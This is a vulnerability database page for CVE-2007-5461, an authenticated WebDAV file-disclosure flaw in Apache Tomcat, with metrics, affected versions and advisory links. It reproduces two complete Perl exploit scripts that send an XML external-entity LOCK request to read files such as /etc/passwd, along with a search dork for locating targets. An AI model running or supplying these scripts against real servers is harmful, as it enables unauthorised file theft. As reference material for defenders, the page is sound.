CVE-2007-5461 : Detail

CVE-2007-5461

Directory Traversal
A01-Broken Access Control
11.32%V3
Network
2007-10-15
16h00 +00:00
2020-02-13
15h08 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Metrics

Metrics Score Severity CVSS Vector Source
V2 3.5 AV:N/AC:M/Au:S/C:P/I:N/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 4552

Publication date : 2007-10-20 22h00 +00:00
Author : h3rcul3s
EDB Verified : Yes

#!/usr/bin/perl #================================================================ # Apache Tomcat Remote File Disclosure Zeroday Xploit - With support for SSL # MoDiFiEd version by : h3rcul3s # ORiGiNaL Version by : kcdarookie aka eliteb0y / 2007 http://milw0rm.org/exploits/4530 # MoDiFiCaTiOn : This code is useble against targets over SSL # Prerequisites : A valid login credentials, webdav # DoRk : intitle:"Directory Listing For /" + inurl:webdav tomcat # Potential targets : similar to https://www.somehost.com:8443 #================================================================ # THaNkS To eliteb0y, the whole team AnD "perlmonks". # This piece of code is written ONLY for educational purpose. # Use it at your own risk. # No author will be responsible for any damage. #================================================================ # -------------------------[C O D E]----------------------------- #================================================================ use LWP::Protocol::https; use IO::Socket; use MIME::Base64; ### FIXME! Maybe support other auths too ? # SET REMOTE PORT HERE-------------------------------------------- $remoteport = 8443; sub usage { print "\nApache Tomcat Remote File Disclosure Zeroday Xploit\n"; print "\n\n"; print "Basic exploit by : kcdarookie aka eliteb0y / 2007\n"; print "SSL Support added by : .o0|h 3 r c u l 3 s|0o. \n"; print "\n\n"; print "USAGE :\nperl TOMCATXPL-SSL <remotehost> <webdav file> <file to retrieve> [username] [password] [https]\n"; print "\nExample:\nperl TOMCATXPL-SSL www.hostname.com /webdav /etc/passwd tomcat tomcat https\n\n";exit; } if ($#ARGV < 2) {usage();} $hostname = $ARGV[0]; $webdavfile = $ARGV[1]; $remotefile = $ARGV[2]; $username = $ARGV[3]; $password = $ARGV[4]; my $sock = LWP::Protocol::https::Socket->new(PeerAddr => $hostname, PeerPort => $remoteport, Proto => 'tcp'); $|=1; $BasicAuth = encode_base64("$username:$password"); $KRADXmL = "<?xml version=\"1.0\"?>\n" ."<!DOCTYPE REMOTE [\n" ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n" ."]>\n" ."<D:lockinfo xmlns:D='DAV:'>\n" ."<D:lockscope><D:exclusive/></D:lockscope>\n" ."<D:locktype><D:write/></D:locktype>\n" ."<D:owner>\n" ."<D:href>\n" ."<REMOTE>\n" ."<RemoteX>&RemoteX;</RemoteX>\n" ."</REMOTE>\n" ."</D:href>\n" ."</D:owner>\n" ."</D:lockinfo>\n"; print "\nApache Tomcat Remote File Disclosure Zeroday Eploit-SSL verssion\n"; print "\n"; print "Launching Remote Exploit over SSL...\n"; $ExploitRequest = "LOCK $webdavfile HTTP/1.1\r\n" ."Host: $hostname\r\n"; if ($username ne "") { $ExploitRequest .= "Authorization: Basic $BasicAuth\r\n"; } $ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL; print $sock $ExploitRequest; while(<$sock>) { print; } # milw0rm.com [2007-10-21]
Exploit Database EDB-ID : 4530

Publication date : 2007-10-13 22h00 +00:00
Author : eliteboy
EDB Verified : Yes

#!/usr/bin/perl #****************************************************** # Apache Tomcat Remote File Disclosure Zeroday Xploit # kcdarookie aka eliteb0y / 2007 # # thanx to the whole team & andi :) # +++KEEP PRIV8+++ # # This Bug may reside in different WebDav implementations, # Warp your mind! # +You will need auth for the exploit to work... #****************************************************** use IO::Socket; use MIME::Base64; ### FIXME! Maybe support other auths too ? # SET REMOTE PORT HERE $remoteport = 8080; sub usage { print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n"; print "kcdarookie aka eliteb0y / 2007\n"; print "usage: perl TOMCATXPL <remotehost> <webdav file> <file to retrieve> [username] [password]\n"; print "example: perl TOMCATXPL www.hostname.com /webdav /etc/passwd tomcat tomcat\n";exit; } if ($#ARGV < 2) {usage();} $hostname = $ARGV[0]; $webdavfile = $ARGV[1]; $remotefile = $ARGV[2]; $username = $ARGV[3]; $password = $ARGV[4]; my $sock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $remoteport, Proto => 'tcp'); $|=1; $BasicAuth = encode_base64("$username:$password"); $KRADXmL = "<?xml version=\"1.0\"?>\n" ."<!DOCTYPE REMOTE [\n" ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n" ."]>\n" ."<D:lockinfo xmlns:D='DAV:'>\n" ."<D:lockscope><D:exclusive/></D:lockscope>\n" ."<D:locktype><D:write/></D:locktype>\n" ."<D:owner>\n" ."<D:href>\n" ."<REMOTE>\n" ."<RemoteX>&RemoteX;</RemoteX>\n" ."</REMOTE>\n" ."</D:href>\n" ."</D:owner>\n" ."</D:lockinfo>\n"; print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n"; print "kcdarookie aka eliteb0y / 2007\n"; print "Launching Remote Exploit...\n"; $ExploitRequest = "LOCK $webdavfile HTTP/1.1\r\n" ."Host: $hostname\r\n"; if ($username ne "") { $ExploitRequest .= "Authorization: Basic $BasicAuth\r\n"; } $ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL; print $sock $ExploitRequest; while(<$sock>) { print; } # milw0rm.com [2007-10-14]

Products Mentioned

Configuraton 0

Apache>>Tomcat >> Version 4.0.0

Apache>>Tomcat >> Version 4.0.1

Apache>>Tomcat >> Version 4.0.2

Apache>>Tomcat >> Version 4.0.3

Apache>>Tomcat >> Version 4.0.4

Apache>>Tomcat >> Version 4.0.5

Apache>>Tomcat >> Version 4.0.6

Apache>>Tomcat >> Version 4.1.0

Apache>>Tomcat >> Version 4.1.1

Apache>>Tomcat >> Version 4.1.2

Apache>>Tomcat >> Version 4.1.3

Apache>>Tomcat >> Version 4.1.4

Apache>>Tomcat >> Version 4.1.5

Apache>>Tomcat >> Version 4.1.6

Apache>>Tomcat >> Version 4.1.7

    Apache>>Tomcat >> Version 4.1.8

    Apache>>Tomcat >> Version 4.1.9

    Apache>>Tomcat >> Version 4.1.10

    Apache>>Tomcat >> Version 4.1.11

    Apache>>Tomcat >> Version 4.1.12

    Apache>>Tomcat >> Version 4.1.13

    Apache>>Tomcat >> Version 4.1.14

    Apache>>Tomcat >> Version 4.1.15

    Apache>>Tomcat >> Version 4.1.16

    Apache>>Tomcat >> Version 4.1.17

    Apache>>Tomcat >> Version 4.1.18

    Apache>>Tomcat >> Version 4.1.19

    Apache>>Tomcat >> Version 4.1.20

    Apache>>Tomcat >> Version 4.1.21

    Apache>>Tomcat >> Version 4.1.22

    Apache>>Tomcat >> Version 4.1.23

    Apache>>Tomcat >> Version 4.1.24

    Apache>>Tomcat >> Version 4.1.25

    Apache>>Tomcat >> Version 4.1.26

    Apache>>Tomcat >> Version 4.1.27

    Apache>>Tomcat >> Version 4.1.28

    Apache>>Tomcat >> Version 4.1.29

    Apache>>Tomcat >> Version 4.1.30

    Apache>>Tomcat >> Version 4.1.31

    Apache>>Tomcat >> Version 4.1.32

    Apache>>Tomcat >> Version 4.1.33

    Apache>>Tomcat >> Version 4.1.34

      Apache>>Tomcat >> Version 4.1.35

      Apache>>Tomcat >> Version 4.1.36

      References

      http://www.debian.org/security/2008/dsa-1453
      Tags : vendor-advisory, x_refsource_DEBIAN
      http://secunia.com/advisories/30908
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://support.apple.com/kb/HT2163
      Tags : x_refsource_CONFIRM
      http://www.securityfocus.com/bid/26070
      Tags : vdb-entry, x_refsource_BID
      http://secunia.com/advisories/27446
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://marc.info/?l=full-disclosure&m=119239530508382
      Tags : mailing-list, x_refsource_FULLDISC
      http://secunia.com/advisories/30676
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://rhn.redhat.com/errata/RHSA-2008-0630.html
      Tags : vendor-advisory, x_refsource_REDHAT
      http://sunsolve.sun.com/search/document.do?assetkey=1-26-239312-1
      Tags : vendor-advisory, x_refsource_SUNALERT
      http://www.redhat.com/support/errata/RHSA-2008-0862.html
      Tags : vendor-advisory, x_refsource_REDHAT
      http://secunia.com/advisories/30899
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://secunia.com/advisories/31493
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://secunia.com/advisories/29242
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.vupen.com/english/advisories/2008/2823
      Tags : vdb-entry, x_refsource_VUPEN
      http://secunia.com/advisories/37460
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://secunia.com/advisories/29313
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.securityfocus.com/bid/31681
      Tags : vdb-entry, x_refsource_BID
      http://secunia.com/advisories/32120
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.vupen.com/english/advisories/2007/3671
      Tags : vdb-entry, x_refsource_VUPEN
      http://secunia.com/advisories/27398
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.redhat.com/support/errata/RHSA-2008-0042.html
      Tags : vendor-advisory, x_refsource_REDHAT
      http://www.securitytracker.com/id?1018864
      Tags : vdb-entry, x_refsource_SECTRACK
      http://secunia.com/advisories/28361
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://secunia.com/advisories/28317
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.vupen.com/english/advisories/2007/3674
      Tags : vdb-entry, x_refsource_VUPEN
      http://secunia.com/advisories/57126
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://secunia.com/advisories/32222
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://secunia.com/advisories/30802
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.redhat.com/support/errata/RHSA-2008-0195.html
      Tags : vendor-advisory, x_refsource_REDHAT
      http://security.gentoo.org/glsa/glsa-200804-10.xml
      Tags : vendor-advisory, x_refsource_GENTOO
      http://www.vupen.com/english/advisories/2007/3622
      Tags : vdb-entry, x_refsource_VUPEN
      http://secunia.com/advisories/27727
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.vupen.com/english/advisories/2008/2780
      Tags : vdb-entry, x_refsource_VUPEN
      http://www.redhat.com/support/errata/RHSA-2008-0261.html
      Tags : vendor-advisory, x_refsource_REDHAT
      https://www.exploit-db.com/exploits/4530
      Tags : exploit, x_refsource_EXPLOIT-DB
      http://www.mandriva.com/security/advisories?name=MDVSA-2009:136
      Tags : vendor-advisory, x_refsource_MANDRIVA
      http://www.debian.org/security/2008/dsa-1447
      Tags : vendor-advisory, x_refsource_DEBIAN
      http://secunia.com/advisories/27481
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://marc.info/?l=bugtraq&m=139344343412337&w=2
      Tags : vendor-advisory, x_refsource_HP
      http://support.apple.com/kb/HT3216
      Tags : x_refsource_CONFIRM
      http://www.mandriva.com/security/advisories?name=MDKSA-2007:241
      Tags : vendor-advisory, x_refsource_MANDRIVA
      http://secunia.com/advisories/29711
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.vupen.com/english/advisories/2009/3316
      Tags : vdb-entry, x_refsource_VUPEN
      http://secunia.com/advisories/32266
      Tags : third-party-advisory, x_refsource_SECUNIA